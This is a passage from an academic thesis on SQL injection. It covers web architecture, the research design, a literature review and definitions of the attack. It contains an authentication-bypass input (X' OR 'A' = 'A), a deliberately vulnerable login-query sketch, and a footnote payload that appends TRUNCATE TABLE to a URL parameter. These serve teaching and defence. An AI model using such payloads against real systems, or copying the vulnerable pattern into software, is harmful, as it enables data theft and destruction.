design. In fact, defining the solution architecture is a preliminary step when making use of the
Web development frameworks mentioned above. Whether layers constrain tiers or tiers
dictate the definition of layers is irrelevant. Solution architects must look at the big
picture when designing a Web solution. A typical Web solution entails three layers: the
presentation layer, the middle layer, also known as business objects, and the data layer (Buehrer,
Weide, & Sivilotti 2005; Landsmann & Strömberg 2003).

Figure 8 - Classic Three-Tier Web Architecture Model
> layers shown: Presentation (Internet Browser and HTML); Business Logic (Encapsulated Business Objects); Data (Relational Database) <
The presentation layer is typically represented by an Internet Browser and comes in the
form of HTML, although other types of content could be delivered. The middle layer is
where the business rules and logic that drive the application are defined, and finally, the
data layer provides data storage and retrieval services (Buehrer, Weide, & Sivilotti
2005; Landsmann & Strömberg 2003). These layers could be part of a more complex
architecture as in Figure 2 - The Evolution of Information Technology Architectures on
page 27, but the base actors are those defined by the classic three-tier Web architecture.
The database, Web server and application logic components are all parts of a larger
system (Landsmann & Strömberg 2003), no matter whether these components are
tightly coupled or loosely coupled. Flaws in one component will jeopardize the
whole solution, as a chain is never stronger than its weakest link. Because this research
focuses on the bottom layer, the data layer, the remaining layers will not be described in
detail.
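The separation into presentation, business logic and data layers can be sketched as follows. This is a minimal illustration under stated assumptions, not a reference design: Python and the standard-library SQLite engine stand in for whatever platform a real solution would use, and the class names, the `products` table and the normalization rule are all hypothetical.

```python
import html
import sqlite3


class DataLayer:
    """Data layer: storage and retrieval only (in-memory database for the demo)."""

    def __init__(self) -> None:
        self._conn = sqlite3.connect(":memory:")
        self._conn.execute("CREATE TABLE products (name TEXT, price REAL)")
        self._conn.executemany(
            "INSERT INTO products VALUES (?, ?)",
            [("chair", 25.0), ("desk", 120.0)],
        )

    def find_products(self, name: str) -> list:
        cursor = self._conn.execute(
            "SELECT name, price FROM products WHERE name = ? ORDER BY name",
            (name,),
        )
        return cursor.fetchall()


class BusinessLogic:
    """Middle layer: applies the (hypothetical) business rules before touching data."""

    def __init__(self, data: DataLayer) -> None:
        self._data = data

    def search(self, raw_term: str) -> list:
        term = raw_term.strip().lower()
        if not term:
            return []
        return self._data.find_products(term)


def render_page(results: list) -> str:
    """Presentation layer: turns results into HTML for the browser."""
    if not results:
        return "<p>No products found.</p>"
    items = "".join(
        f"<li>{html.escape(name)}: {price:.2f}</li>" for name, price in results
    )
    return f"<ul>{items}</ul>"


app = BusinessLogic(DataLayer())
print(render_page(app.search("  Chair ")))
```

Each layer only talks to the one directly beneath it, which is the property the three-layer model relies on; a flaw in any single layer still affects the whole chain.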

One of the main reasons this research studies the data layer is its paramount role in
Web applications that deliver dynamic content and therefore make e-Business
possible. Halfond & Orso (2005a) state that «many organizations have a need
to store sensitive information, such as customer records or private documents, and make
this information available over the network. For this reason, database-driven Web
applications have become widely deployed in enterprise systems and on the Internet».
Buehrer, Weide, & Sivilotti (2005) go even further and state that Web applications
employing database-driven content are ubiquitous. Not just Internet companies such as
Yahoo or Amazon, but also companies of the old economy require a presence on the
Web, and almost always this presence is ensured by means of a relational database. In
its simplest form, a Web application receives input from the user and forwards it to
the business logic layer, which reacts according to its rules (for example, when the user
searches for a specific product) and in turn performs some task on the data services
end.
Figure 9 - Use of Textual Representation in an Application
> adapted from (Pietraszek & Berghe 2005) <
[Figure 9 contents. Inputs: Network Input (Get, Post, Cookie); Direct Inputs (arguments, env.);
Stored Inputs (DB, XML, CSV). Outputs: Execute (shell, XSLT); Query (SQL, XPATH);
Locate (URL, path); Render (HTML, SVG); Store (DB, XML). Other labels: Textual
Representations; constants.]

Figure 9 describes the various types of inputs an application may receive, and the
corresponding outputs it may generate. In a way, this diagram also depicts the three-tier
Web architecture, but using a horizontal approach centered around the logic beneath
the application, making it easier to discern the cause-effect outcome of the user input on
the outputs. The commonality across the various types of inputs and outputs is the fact
that all have a textual representation within the application and this is where code
injection attacks effectively go into action.
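As a minimal sketch of this point (an illustration added here, not taken from Pietraszek & Berghe), the following Python fragment shows a constant query template and a network input merging into a single textual representation. The Products table, the Name column and the build_query helper are hypothetical names chosen for illustration only.

```python
# Hypothetical illustration: a constant and a network input are merged into
# one textual representation (here, the text of an SQL query).
QUERY_TEMPLATE = "Select * From Products Where Name='{name}'"  # constant part


def build_query(name: str) -> str:
    """Compose the query text by plain string substitution (unsafe on purpose)."""
    return QUERY_TEMPLATE.format(name=name)


# A benign input only contributes a value to the query text.
benign = build_query("chair")

# A crafted input contributes SQL syntax as well as a value.
crafted = build_query("chair' OR 'A'='A")

print(benign)
print(crafted)
```

Once merged, the application can no longer tell which characters came from the constant template and which came from the user; in the second string the input has contributed query syntax rather than just a value.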
In summary, organizations cannot get rid of core business systems at the same rate
they become legacy, but legacy applications are known to be prone to development
errors (Huang et al. 2004; Viega & Messi 2004). While reality dictates that legacy
systems are an integral part of the corporate IT infrastructure, they now have to endure
the pressure caused by the Web shift although they were never designed to
withstand such demand. In addition, Web applications tend to have rapid
development cycles (Huang et al. 2003). And although security is critical in almost
every Web application (Spett 2002), only a small fraction can afford a detailed
security review (Nguyen-Tuong et al. 2004). Web architectures are normally divided
into tiers, and a flaw in one component can jeopardize the whole solution. As
a result, most Web applications contain security vulnerabilities, and serious security
vulnerabilities are regularly found in the most prominent commercial Web
applications, including Gmail, eBay, Yahoo, Hotmail and Microsoft Passport
(Nguyen-Tuong et al. 2004). The dependency of Web applications on relational databases
and the role of databases within organizations certainly make them a tempting
target for anyone seriously looking to cripple an organization or to gain personal
benefit.

SQL Injection – The Research Topic
So far the reader has been taken on a journey across the three factors dictating the status
quo surrounding the research topic and the underlying causes behind logical attacks such
as SQL Injection attacks. These three factors are organizational, technological and
methodological in nature. The following diagram summarizes the findings of the
preceding topics in a consolidated view:
Figure 10 - Summary of the Causing Factors of SQL Injection
[Figure 10 contents. Organizational > Ecosystem Paradigm: business units are now part of an
ecosystem within the company; organizations and IT aligned to transversal business processes.
Methodological > Web Paradigm: exponential growth of interconnected systems; legacy systems are
prone to design flaws; databases enable e-Business, but depend on legacy; rapid development
cycles. Technological > IT Security: mature mechanisms for infrastructure security; ineffective
mechanisms against logical attacks. Problems remained essentially the same: Systems Integration,
People Mgmt, Updating Business Processes. Challenges remained the same: Cost-Reduction, Revenue,
Time-to-Market. Outcome: logical attack against data and core business systems via a front-end.]
Throughout the years organizations have striven to reduce costs and leverage the use of
the existing technology assets at their disposal while seeking to better customer service,
improve competitiveness, and be more responsive to the strategic priorities of the business
(Endrei et al. 2004). This caused departmental boundaries to blur, providing the stage for
the implementation of transversal business processes. IT became more business-centric in
response to the Web shift even though the basic business problems and challenges
remained essentially the same. The advent of the Web carried the sight of new
unexplored markets, but the conquering rush unfortunately kept old problems unsolved.
Organizations have grown in complexity and size in great measure thanks to the
reliability and scalability of database management systems. As a result, security
increasingly became a concern and Web attacks are rapidly becoming one of the
fundamental threats for information systems connected to the Internet (Álvarez &
Petrovic 2003). This relatively new phenomenon can partially be explained by the
popularity of Web applications and techniques to exploit their security vulnerabilities
(Buehrer, Weide, & Sivilotti 2005). While most Web servers are separated from clients by
firewalls and other security devices, Web applications nonetheless offer users
legitimate channels through firewalls into corporate systems. Often, these core
corporate systems still consist of legacy systems and applications. They now have
to endure the pressure caused by the Web shift although they were never designed to
withstand such demand, and such applications are known to be prone to
design flaws (Huang et al. 2004; Viega & Messi 2004). The dependency of Web
applications on relational databases and core business legacy systems, and the role of
databases within organizations, certainly make them a tempting target. This led to
the proliferation of logical attacks, which try to fool the application into executing some
carefully crafted code on the hacker’s behalf using the application’s security context. SQL
Injection is a type of code-injection attack targeting databases that are accessible,
typically through a Web frontend; it takes advantage of flaws in the input validation
logic of application components in order to achieve its purposes.

About SQL Injection
SQL, an acronym for Structured Query Language, is a standard interactive and programming
language for getting information from and updating a database. Melton (1996) defines
it as a relational database data sublanguage. Although SQL is both an ANSI and an ISO
standard, many database products support SQL with proprietary extensions to the
standard language [4]. Queries take the form of a command language (Anley 2002b).
Anley also adds that the typical unit of execution of SQL is the “query”, which is a
collection of statements that typically return a single “result set”. SQL statements can
modify the structure of databases (using Data Definition Language statements, or DDL)
and manipulate the contents of databases (using Data Manipulation Language
statements, or DML). Because SQL is a standard language for all relational database
management systems, SQL Injection cannot be attributed to flaws of a specific product;
it is rather the result of a failure to validate inputs within the application components [5].
The literature provides an extensive set of definitions for SQL Injection which orbit fairly
close around the same base concept. Álvarez & Petrovic (2003) provide a broad and simple
definition by stating that an SQL Injection attack is in place when «an attacker creates or
alters existing SQL commands to gain access to unintended data or even the ability to
execute system level commands on the host.». Yet Yao-Wen Huang, Shih-Kun Huang, Lin,
& Tsai (2003) prefer to center it on the Web. This view is also shared by several other
sources (Anley 2002b; Boyd & Keromytis 2004; Cerrudo 2002; Huang et al. 2004; Kost
2003). In summary, these sources define SQL Injection as a flaw in the input validation
logic of a Web application that, via a Web frontend, receives user input containing
malicious patterns used in the construction of a legitimate SQL query, ultimately leading
to the arbitrary execution of SQL and operating system commands.
[4] The SQL dialect used in this work will be Microsoft’s, also known as Transact-SQL.
[5] As the topic is RDBMS-agnostic, this work will use Microsoft SQL Server, one of the most
popular RDBMSs if not the most popular, as the base platform whenever examples or
experimentation take place.
Simple Conceptual Example
As a motivating example, let’s consider a scenario of an online banking application that
allows customers to log in and view their accounts, make payments, and so on. In order
to access these services, customers must undergo a compulsory
authentication step by providing logon credentials in the form of a username and a
password on a dedicated page created for that purpose. This Web page
represents the third tier of the classic Web application model (consult Figure 8 - Classic
Three-Tier Web Architecture Model on page 40). When data is submitted to the
middle-tier, the corresponding application modules (ASP, JSP, CGI, Perl, etc.) will take the
user’s input and use it for building a query to be executed against the data-tier. The
data-tier is almost always represented by a relational database management system and
consequently the query built by the middle-tier components is written in the SQL dialect
of that RDBMS. In this scenario, a typical validation query would look similar to this:
Select * From Users Where Login='Miguel' and Password='secret'
The SQL language was designed to be similar to English, and even someone without any
knowledge of SQL could probably understand the meaning of the expression. It queries
the database for all the information registered for user “Miguel” with password “secret”,
which implicitly denotes that a response is expected. Among other actions, this response
will be used to determine if the user has successfully authenticated [6] by proving his
identity. For example, if the database response is empty, the underlying implication is that
there is no user named “Miguel” with password “secret” on record. On the other
hand, a non-empty response from the database would inform the components on the
middle-tier that the user is authentic. The middle-tier then produces an output to the
presentation-tier according to the business rules. This output typically represents the very
next Web page the user is presented with and its contents are contextualized according
to the user data returned by the database. Furthermore, it is common for this output to
contain a security token which will enable the user to perform various subsequent actions
on the application without the need for re-authenticating. In this scenario, the output
should be a Web frontend containing a security cookie and exhibiting a set of menus
with options that enable the user to view his account movements, make payments and
perform all sorts of financial transactions.
[6] Authentication is only one out of three principal mechanisms applied for ensuring security’s
key goals. Encryption and access control complete this set.
How does SQL Injection fit into all this?
Suppose the user is knowledgeable about it and decides to perform a logical attack on
the application by injecting some malicious code in the username and password textboxes on
the logon Web page in the hope of fooling the authentication logic of the underlying Web
application. Consider the following value for both username and password:
X' OR 'A' = 'A
This simple text string does not require any special tool to develop, nor any hacking
program to send it to the Web server. The resulting validation SQL query performed by
the middle-tier against the database would look like:
Select * From Users Where
Login='X' OR 'A' = 'A' and Password='X' OR 'A' = 'A'

Analyzing this query is a little more complicated than the previous one, as a logical analysis is
required. First, the resulting query is well-formed in terms of its syntax. Second, it
refers to no structures or database objects other than those of the original query. In other
words, no knowledge of the database structure was required. Third and
most important, the WHERE expression evaluates to true. “A” is always equal to “A”, so that
comparison evaluates to true, and binary logic dictates that False OR True = True. In common
words, if someone says «I’m male or I’m female», the statement holds whichever part is true.
So even if the login is “X”, which is probably false, the login portion of the expression
evaluates to true. The same happens in the second portion, which contains the evaluation of
the password. Read this way, the remaining logical expression combines the “True” resulting
from the login evaluation and the “True” resulting from the password evaluation using
the AND logical operator, which yields “True”. Strictly speaking, SQL gives AND precedence
over OR, so the expression is actually grouped as
Login='X' OR ('A' = 'A' AND Password='X') OR 'A' = 'A'; the outcome is the same, since the
trailing OR 'A' = 'A' alone makes the whole expression true. The authentication mechanism is
thus bypassed, providing free access to the account of the unlucky user who had the
privilege to be listed at the top.
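The bypass described above can be reproduced in a few lines. The sketch below is an illustration under stated assumptions rather than the experimental setup of this work: it uses Python with an in-memory SQLite database as a stand-in for the ASP and SQL Server stack, the Users table follows the example query, and the sample rows and helper names (make_db, login_vulnerable) are hypothetical.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a hypothetical Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("Create Table Users (Login TEXT, Password TEXT)")
    # Plaintext passwords mirror the example query only; sample rows are made up.
    conn.executemany(
        "Insert Into Users (Login, Password) Values (?, ?)",
        [("Ana", "first-row-password"), ("Miguel", "secret")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, login: str, password: str) -> list:
    """Build the validation query by string concatenation, as in the example."""
    query = (
        "Select * From Users Where Login='" + login
        + "' and Password='" + password + "'"
    )
    return conn.execute(query).fetchall()


conn = make_db()

# Correct credentials return exactly one row; wrong ones return none.
legit = login_vulnerable(conn, "Miguel", "secret")
wrong = login_vulnerable(conn, "Miguel", "guess")

# The crafted value turns the WHERE clause into an expression that is always true.
payload = "X' OR 'A' = 'A"
injected = login_vulnerable(conn, payload, payload)

print(len(legit), len(wrong), len(injected))
```

Under these assumptions the crafted value matches every row in Users, so an application that simply takes the first returned row would log the attacker in as whichever user the database happens to return first.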
All networking security mechanisms were bypassed as a legitimate channel was used to
reach the database. Furthermore, Web requests such as the one depicted in the
example are often transmitted in the form of HTML form posts. Due to the data load, such
requests are typically not logged, making the attack virtually undetectable as no
activity trail is left behind. This rather simple example demonstrates the power of
this technique and the losses it can inflict on people and organizations.
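For contrast, and only as a hedged sketch of a commonly used countermeasure rather than a technique proposed by this work, the same validation query can be issued with bound parameters so that user input is never parsed as SQL. Python and an in-memory SQLite database stand in for the real platform; the helper login_parameterized and the sample row are hypothetical.

```python
import sqlite3

# Hypothetical Users table with one sample row, mirroring the example query.
conn = sqlite3.connect(":memory:")
conn.execute("Create Table Users (Login TEXT, Password TEXT)")
conn.execute("Insert Into Users (Login, Password) Values ('Miguel', 'secret')")


def login_parameterized(conn: sqlite3.Connection, login: str, password: str) -> list:
    """Run the validation query with bound parameters instead of concatenation."""
    # The ? placeholders keep user input as data; it is never parsed as SQL.
    query = "Select * From Users Where Login=? and Password=?"
    return conn.execute(query, (login, password)).fetchall()


payload = "X' OR 'A' = 'A"

# Correct credentials still match the stored row.
ok = login_parameterized(conn, "Miguel", "secret")

# The crafted value is compared literally and matches no row.
blocked = login_parameterized(conn, payload, payload)

print(len(ok), len(blocked))
```

Here the crafted string is treated as an ordinary, if unusual, login name and password, so the query returns no rows and the check fails as intended.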

ABOUT THIS RESEARCH
Up to now the research topic, its background and status quo have been broadly outlined,
all with the purpose of introducing the goals that stand behind this research, its purpose,
motivation, and most important of all, the research question. These will be properly
addressed over the next subtopics.
The Problem and Challenges
The statement of Landsmann & Strömberg (2003) that «Every Web Application using a
relational database can theoretically be a subject for SQL Injection attacks» summarizes in
a very neat way the seriousness of the SQL Injection threat and the overwhelming
challenge of countering it. Three key points surface from the Background topic as
the foremost factors supporting this statement: a) this type of attack caught
organizations completely unprepared, as it tears down existing security barriers, thereby
shattering existing investments in IT security; b) it is a relatively new problem, as the
Internet comes forth as “the” catalyst responsible for the increase in the number and
diversity of attacks; c) lack of awareness is probably the single most important factor
accountable for this technique’s success, holding back other researchers and IT experts
in their efforts to further investigate and address this issue in a consistent and
systematic way. By now it is clear that the hacker community holds the edge, and the
literature suggests that only minimal resources are being invested (Landsmann
& Strömberg 2003). Furthermore, the lack of academic literature on the subject is
astonishing, and while the IT industry has begun awakening to the problem, the number
of rich and ingenious available resources scattered across hacking sites and underground
communities is absolutely remarkable compared to what researchers and IT experts have
as baseline for their studies.

The Research Question
«Can the weakness of modern e-Business systems be demonstrated
by proving SQL Injection techniques to be effective in obtaining and
altering private business data?»
The research question almost comes naturally from the research topic, and although it
looks pretty straightforward and a subject of experimentation in order to confirm what
literature states, the hard work lies beneath. As previously stated, the topic has been
neglected as the growth of attacks is fairly recent, and therefore there are few studies
that can be used as support basis. For that matter, it is necessary to develop a taxonomy
of attacks first in order to prove the research question right or wrong. So the added value
of this research does not lie directly on the research question itself, but on the underlying
steps. Proving it will only serve to validate the taxonomy.
Purpose and Goals
Now that an overview of the problem and its underlying challenges has been
presented, it is appropriate to address questions such as “what do we already know
on the subject?” and “how does this research fit into the grand picture composed by
similar studies in the field?”. The literature clearly indicates the topic has barely been
studied thus far (Landsmann & Strömberg 2003), and security standards and built-in security
measures urgently need to be developed. Actually, the word “awareness”, or the lack of it,
summarizes what is probably the prime factor contributing to the hacker community’s
lead. No taxonomy of attacks has ever been attempted and resources on the topic still lie
scattered across various underground sources. The stakes are high, as organizations have
much to lose to those who, without much effort and with some ingenious
craftsmanship, can maliciously take over what is most treasured within an Information
Society: Information itself. This research primarily seeks to shed some light on the
obscurity that for far too long has been characteristic of the topic, by proposing a
taxonomy of attacks which will consolidate existing academic, professional and
underground materials. It is not this work’s goal to provide enough experimental
evidence to validate the taxonomy, nor will a set of preventive techniques be proposed,
although these are valid questions worthy to be studied in future works. Nonetheless,
whenever appropriate some experimentation and smart defensive techniques will be
mentioned.
Scope
The scope of SQL Injection and its implications extend far beyond databases, Web
applications and security, and even those are vast areas of research of their own.
Therefore it is necessary to narrow down the scope of this research in addition to the
scope already set by the research topic and research question. The following bulleted list
attempts to summarize the scope of this work:
• Portray the status quo as an introductory path to the topic:
   - Systematize the most commonly used set of practices and systems
     architectures used for implementing e-Business platforms;
   - Establish a clear dependency of e-Business systems on relational database
     management systems;
• Expose SQL Injection:
   - By investigating different variations;
   - By proposing a taxonomy of attacks:
      · Explaining the concept;
      · Modus operandi;
      · Effectiveness of the technique;
      · Applicability scope;
• Perform experimentation and ultimately answer the research question;
• Based on the gained experience, propose simple first line defensive techniques.
Motivation
Part of the motivation for pursuing this research comes from the fact that the researcher
is a solution architect for the Hewlett-Packard Corporation, acting in the Enterprise
Application Services practice of the Consulting & Integration division. While interfacing
with or auditing corporate systems, all too often he faces situations where an SQL
Injection attack could easily devastate the core business systems and cripple the
company’s ability to do business. The lack of awareness is almost unbelievable:
developers rarely code defensively, and systems engineers have the false feeling that their
extremely expensive set of firewalls and intrusion detection systems will ensure IT security.
The stakes are indeed high, and organizations that have suffered such attacks and have
actually detected them rarely speak up, as it would further compromise their ability to
guarantee integrity, availability and confidentiality to their customers. Therefore, the
motivation and prime goal of this work is to expose and systematize the problem, and
then prove the proneness of the major and most popular e-Business systems to these
attacks, thus empowering other researchers and IT experts to pursue further
developments in security.

Document Outline
This thesis is divided into seven chapters plus two additional sections, namely References
and Glossary which can be found at the end of the document. The organization of
chapters and their purpose is as follows:
Chapter 1 INTRODUCTION
Introduces the research topic by providing an overview of the facts
that led to the formulation of the research question.
Chapter 2 LITERATURE REVIEW
Describes the process of providing a detailed and justified analysis
of and commentary on the merits and faults of the key literature.
Chapter 3 METHODOLOGY
Presents an overview of the research methods ecosystem and
formulates the research methods for addressing this work’s goals.
Chapter 4 ATTACK TAXONOMY
Performs a survey of the existing SQL Injection techniques and then
proposes the very first taxonomy of SQL Injection attacks.
Chapter 5 EXPERIMENTING
Performs experimentation on a real live system on the Internet as
means of building internal validity.

Chapter 6 DEFENSIVE TACTICS
Presents a first line of defensive tactics against SQL Injection attacks.
Chapter 7 CONCLUSIONS
Presents a final argument and what this work accomplished in
terms of bridging the gap between different bodies of knowledge.
REFERENCES
Formal list of all bibliographic sources acknowledged and
referenced throughout this thesis.
GLOSSARY
Consistent set of acronyms, jargon and definitions which are used
throughout this thesis.

Chapter 2
LITERATURE REVIEW
Critical literature review will form the foundation on
which the research is built. It describes the process of
providing a detailed and justified analysis of and
commentary on the merits and faults of the key literature
on the research topic. Although it is generally an early
activity, the process can be likened to an upward spiral
mounting throughout the project’s lifespan.
This chapter outlines the findings of an extensive literature review performed on
the research topic and attempts to answer questions such as “what do we
already know on the subject?” and “how does this research fit into the grand
picture composed by similar studies in the field?”. The chapter ends with a
critical analysis of the findings in line with the researcher’s critical judgment.

RESEARCH STRATEGY
According to Cormack (1991), a literature review is «… the process of systematically
identifying published materials which meet predetermined criteria». Regardless of whether the
review itself claims to be systematic, according to Hek et al. (2000) the searching process
should always be so. Saunders, Lewis, and Thornhill (2003) add that «critical literature
review will form the foundation on which the research is built. It describes the process of
providing a detailed and justified analysis of and commentary on the merits and faults of
the key literature on the research topic». Therefore a literature review has two very
important characteristics: it should be systematic, so that other researchers following the
same steps are able to replicate the findings, and it should be critical, which
denotes that the researcher’s critical judgment will be used (Saunders, Lewis, & Thornhill
2003) to weigh the findings when producing the review conclusions. This last stage is where
the researcher blends with the systematic part of the literature research process by
adding his own unique touch to the outcome. Since science requires results to be
replicable by other researchers – although there is still some discussion
around the participatory role of the researcher in inductive research – it is imperative that
a clear literature research strategy is set as a blueprint of what is yielded by the whole
literature review process.
Saunders, Lewis, and Thornhill (2003) state that although the literature search is an early
activity for most researchers, it is usually necessary to revisit this activity during the
project’s life. This recursiveness can be likened to an upward spiral mounting throughout
the project’s lifespan culminating in the final draft of a written literature review. The
following diagram attempts to depict this spiralling process as stated by Saunders:

Figure 11 - The Literature Review Process
> adapted from (Saunders, Lewis, & Thornhill 2003) <
[Figure 11 contents: a spiral of repeated review cycles. Labels: Research Question and
Objectives; Define parameters; Generate and refine keywords; Conduct search; Obtain literature;
Evaluate; Record; Start Drafting Review; Redefine; Update and revise draft; Written critical
review of the literature.]

For the sake of simplicity, instead of documenting each and every interaction the author
underwent while searching the literature, only the research strategy and its results will be
presented. For that purpose, Bell’s checklist will be used. Bell (1999) proposes a concise
checklist which provides an action plan for collecting information about the research
topic. This checklist is briefly described here:
• Define the review topic;
• Identify the key concepts and associated terminology;
• Define parameters:
   - Language – only materials in English?
   - Geography – only materials published in the UK?
   - Time Period – only the last five years?
   - Type of Materials – Books, journal articles, newspaper articles, Internet
     pages, etc.
   - Sector – NHS, private sector;
• List possible search terms;
• Identify appropriate sources of information to be searched;
• Review and refine search as necessary;
• Document review methods and results.
Not surprisingly, the definition of the research topic and its subsequent well-formed
answerable research question should also be supported by literature. Formulating a
well-defined research question, meaning it must be precise rather than broad and
answerable rather than ill defined, is crucial since it will serve as both starting and end
point of the whole literature review process as per the model depicted in Figure 11 - The
Literature Review Process on page 57. This view is also shared by Huth (1982), who states
that a well-conceived review always answers the question specified at its beginning.
Furthermore, the research question or the research objectives might conceal several
subtopics within themselves and separate review cycles on those subtopics may be
necessary. For this research, a quick review of the research objectives described in the
Purpose and Goals and Scope sections on pages 50 and 51 yields several subtopics
that need to be addressed: “SQL Injection”, the main topic; attached to it,
“Relational Databases”, “SQL”, “Logical Attacks” and “Code-Injection”; then “Web” and
“e-Business”; and finally “Taxonomy Formulation”.
One could legitimately ask where such terms came from. The answer is the
literature review. Even if other activities or methods were used, for example the
researcher’s own gained experience, documented scientific knowledge must be used as
rationale for each and every claim. This principle also applies when claiming the existence
of a scientific emptiness in one particular field as a basis for conducting research and
consequently formulating the research question. Proof for that claim is required, and
therefore a literature review process is compulsory. Of course the researcher’s own gained
experience still plays an important role. Systematic thinking and acting is not an easy task
and takes time to learn. Experience is ultimately an ally guiding the steps toward efficient
finding of the information resources required to answer the burning question on the
researcher’s mind. Although the activities engaged to formulate the research topic,
question and objectives are not documented herein, the process followed was the one
depicted in Figure 11 - The Literature Review Process on page 57, and its results are
laid out in the introductory chapter. This initial review led to the identification of possible
key concepts and associated terminology surrounding the research topic, which were
later used in this literature review. The resulting list of terms is the one yielded by the
above-mentioned breakdown of the research question and its objectives, in particular
“SQL Injection”, “Logical Attacks”, “Code-Injection” and “Taxonomy”.
With regard to search parameters, i.e. language, geography, time period, type of materials
and sector, the topic is itself transversal to all of these, and no predefined scope reduction
other than logistics and human limitations was introduced. The literature clearly prefers to
centre the research topic on the Web (Anley 2002b; Boyd & Keromytis 2004; Cerrudo
2002; Huang et al. 2004; Kost 2003), thus making it global and multilingual, although the
linguistic knowledge of the researcher limits him to English, Portuguese and French
sources. The research topic also concerns corporations, as they began to adopt Web
applications by connecting their systems to the Web, and database-driven Web
applications have become widely deployed on the Internet (Halfond & Orso 2005b). For
that reason, with regard to sectors, both academic and privately held information sources
were considered, though a tremendous lack of academic literature on the subject
has been observed, whereas the number of rich and ingenious resources scattered
across hacking sites and underground communities is absolutely remarkable. Not
surprisingly, the timeframe of the collected information sources spans from the mid-1990s
to the present day, which roughly coincides with the dawn of e-Commerce and the
subsequent rise of Web attacks (Álvarez & Petrovic 2003; Buehrer, Weide, & Sivilotti
2005).
The following information sources were the primary search engines used when searching
for literature using the search terms identified:
• Biblioteca do Conhecimento Online – http://www.b-on.pt;
• Wiley Interscience – http://www3.interscience.wiley.com;
• SpringerLink – http://www.springerlink.com;
• IEEE Xplore – http://www.IEEE.org;
• ACM Digital Library – http://portal.acm.org;
• Web of Science – http://portal.isiknowledge.com;
• ProQuest – http://proquest.umi.com;
• Scitation – http://scitation.aip.org;
• Citebase Search – http://citebase.eprints.org;
• Google – http://www.google.com;
• Google Scholar – http://scholar.google.com (Beta);
• E-Donkey peer-to-peer network.
These primary search engines served as the starting point for the literature review process
and were revisited each time a search and review cycle took place. At that stage, internal
evidence was the leading factor in steering the actions to be undertaken in the
forthcoming review cycles, as the researcher opted to engage the formal critical
analysis phase at the very end of the review process.

FINDINGS
This section aims to portray in a structured fashion what the literature review process
illustrated in Figure 11 - The Literature Review Process on page 57 has yielded. The fact that
it is named “Findings” instead of “Yieldings” implies that some refining, reasoning and
sorting of materials has taken place even prior to the formal critical review phase. These
materials are of various types and span a wide spectrum of information sources.
Still, the majority of the collected sources come from the primary and secondary
information sources, as per the following diagram:
Figure 12 - Literature Sources Available
[Diagram: literature sources arranged by level of detail and time to publish.
Primary: reports, theses, emails, conference reports, company reports, some government
publications, unpublished work. Secondary: newspapers, books, journals, Internet, some
government publications. Tertiary: indexes, abstracts, catalogues, encyclopedias,
dictionaries, bibliographies, citation indexes.]
This outcome is not totally unexpected and can be explained in great measure by the
fact that the research topic is a relatively new phenomenon, as established in the
introductory section. Therefore, the reader should expect to find several references to
industry reports and Internet sources over the forthcoming subtopics. Nevertheless, a
significant effort was made to confirm and consolidate the claims held by such sources by
resorting to academic materials whenever those were available.

Definition of SQL Injection
At this point the research topic should not be an alien subject to the reader, as an
overview of the surrounding facts has been portrayed in the introductory chapter. In
accordance with that chapter’s goals, an empirical view was employed as the guiding
principle for introducing the topic. Hence, no formal definition for SQL Injection has been
presented nor has a review of the existing proposed definitions been attempted.
Finding a suitable definition for SQL Injection is not an easy task. Queries for a standard
definition performed on the IEEE and ISO web sites return nothing. A quick search on the
world’s best known encyclopaedia, Britannica, yields the same result. Even Google’s
powerful search engine only returns four entries for «define:”SQL Injection”», one of
which is provided by Wikipedia, another famous encyclopaedia known for an operating
model that is entirely entrusted to its community of members. The article states that
«SQL Injection is a security vulnerability that occurs in the database layer of an
application. Its source is the incorrect escaping of dynamically-generated string literals
embedded in SQL statements» (Wikipedia 2006f). Though the argument that it occurs in
the database layer is open to discussion (see Figure 8 - Classic Three-Tier Web
Architecture Model on page 40), this simplistic definition offers an entry-level view into
the problem and puts the finger right where it hurts the most. It mentions three
causative key factors: i) dynamically-generated string literals; ii) embedding into SQL
statements; iii) escaping. The attempt to define SQL Injection by employing a cause-effect
perspective that briefly describes the modus operandi recurs throughout the literature.
This was pretty much the strategy taken for introducing the topic in the last section of
the first chapter. Landsmann & Strömberg (2003) define it as «an attack method used by
hackers to retrieve, manipulate, fabricate or delete information in organizations’ relational
databases through web applications». Yao-Wen Huang et al. (2003) employ a similar
view, yet they opt for a more generic description of the type of operations one can
perform and complement the definition by pinpointing data validation as a causative
factor. They state that «if the data is not properly processed prior to SQL query
construction, malicious patterns that result in the execution of arbitrary SQL or even
system commands can be injected». Finnigan (2002) explores this concept further by
introducing another one, the bypassing of existing security mechanisms. He
states that SQL Injection is a way to attack the data of a database protected by a
firewall, in which the parameters of a Web application are modified in order to change
the SQL statements being executed against the backend database management system.
He also adds that «for example, by adding a single quote (‘) to the parameters, it is
possible to cause a second query to be executed with the first», thus escaping the first
portion of the query and injecting a new one. As mentioned by Finnigan, single-quote
escaping is just an example, and these types of injections are not limited strictly to
character fields (Boyd & Keromytis 2004). Boyd & Keromytis declare that analogous
manipulations of the query’s WHERE and HAVING clauses have been reported when, for
example, the application does not restrict the data used on numeric fields to numeric
values [7]. This technique can
also exploit implicit type casting of the RDBMS, e.g. integers being automatically
converted to strings and vice-versa. Kost (2003) opts for a broader perspective and defines
SQL Injection as when an «attacker passes string input to an application in hopes
manipulating the SQL statement to his or her advantage». He also claims that SQL
Injection attacks are simple in nature and that the complexity of the attack involves
exploiting a SQL statement that may be unknown to the attacker. Sam M.S. (2005)
specifically mentions the application layer when he states that «it is an application layer
attack to inject SQL commands along with other valid inputs possibly via web pages». By
going through all these views it is possible to determine that SQL Injection has much to
do with input validation logic and systems architectures. Despite that fact, most literature
sources portray it in a Web context (Anley 2002b; Boyd & Keromytis 2004; Cerrudo
2002; Finnigan 2002; Huang et al. 2004; Huang et al. 2003; Kost 2003; SecuriTeam.com
2002; Spett 2002) and quite a few claim this is strictly a Web applications’ problem. This
view can partially be explained by the popularity of Web applications and of the techniques
to exploit their security vulnerabilities (Buehrer, Weide, & Sivilotti 2005). Many other
information sources were reviewed, but they all present views similar to the ones depicted
here, and all employ a cause-effect strategy for defining what SQL Injection is all about.
[7] Suppose that in the legitimate query SELECT * FROM [Orders] WHERE CustomerID=104, where 104
stands for a numeric parameter on the URL of a web page, e.g. http://server/getOrders.aspx?CustomerID=104,
the value of the CustomerID parameter is manipulated to be equal to 1;TRUNCATE TABLE [Orders]. This
simple example would cause the orders table to be completely wiped out by means of a second query injected into
